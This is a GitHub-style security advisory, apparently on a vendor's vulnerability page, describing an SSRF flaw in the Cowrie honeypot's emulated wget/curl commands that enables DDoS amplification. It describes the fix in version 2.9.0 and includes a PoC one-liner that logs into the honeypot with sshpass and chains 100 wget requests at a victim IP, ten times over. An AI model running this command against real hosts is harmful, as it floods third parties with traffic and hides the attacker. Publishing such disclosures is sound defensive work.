GHSA-83jg-m2pm-4jxj
HIGHCowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
cowrieReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
Details
When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The wget and curl command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.
An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands targeting a victim host. Since there was no rate limiting mechanism in place, the attacker could generate unlimited outbound HTTP traffic toward the victim. The requests originate from the honeypot's IP address, effectively masking the attacker's identity and turning the honeypot into an unwitting participant in distributed denial-of-service (DDoS) attacks.
This vulnerability was observed being actively exploited in the wild.
Acknowledgements This vulnerability was investigated by Abraham Gebrehiwot and Filippo Lauria, with additional contributions from Michele Castellaneta, Claudio Porta and Sara Afzal. All researchers are affiliated with the Institute of Informatics and Telematics (IIT), Italian National Research Council (CNR).
Fix
This issue has been fixed in version 2.9.0 via PR #2800, which introduces a rate limiting mechanism for outbound requests in command emulations such as wget and curl.
PoC
This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability.
Setup:
- Victim machine (192.168.1.30): runs a simple HTTP server
- Attacker machine (192.168.1.20): initiates the attack
- Cowrie honeypot (192.168.1.10): configured in emulated shell mode with SSH access (credentials:
test:test)
On the victim machine, start an HTTP server:
sudo python3 -m http.server 80
On the attacker machine, execute:
PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;'; done) && \
for i in {1..10}; do sshpass -p test ssh [email protected] "$PAYLOAD"; done
This command builds a PAYLOAD consisting of 100 concatenated wget commands, then executes it 10 times via SSH, resulting in 1,000 HTTP requests toward the victim from a single attack script. The amplification factor can be arbitrarily increased by adjusting these values, bounded by technical limitations such as argument length, buffer sizes, etc.
Result: The victim's HTTP server logs show 1,000 requests originating exclusively from the honeypot's IP address (192.168.1.10), received within approximately 5 seconds (truncated for brevity):
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
...
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
Notice that the attacker's IP (192.168.1.20) never appears in the victim's logs, demonstrating how the honeypot masks the attacker's identity.
Impact
This is a Server-Side Request Forgery (SSRF) vulnerability that enables abuse of Cowrie honeypots as DDoS amplification nodes.
Who is impacted: Any organization running Cowrie in emulated shell mode (the default configuration) with versions prior to 2.9.0.
Consequences:
- Third-party victims receive unwanted HTTP traffic from the honeypot's IP address
- Attackers can mask their identity behind the honeypot's IP
- Honeypot operators may face abuse complaints or have their infrastructure blocklisted
- Network resources of the honeypot host are consumed
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | cowrie | all versions | 2.9.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for cowrie. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update cowrie to 2.9.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-83jg-m2pm-4jxj is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-83jg-m2pm-4jxj is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-83jg-m2pm-4jxj. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-83jg-m2pm-4jxj in your dependencies?
O3 detects GHSA-83jg-m2pm-4jxj across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.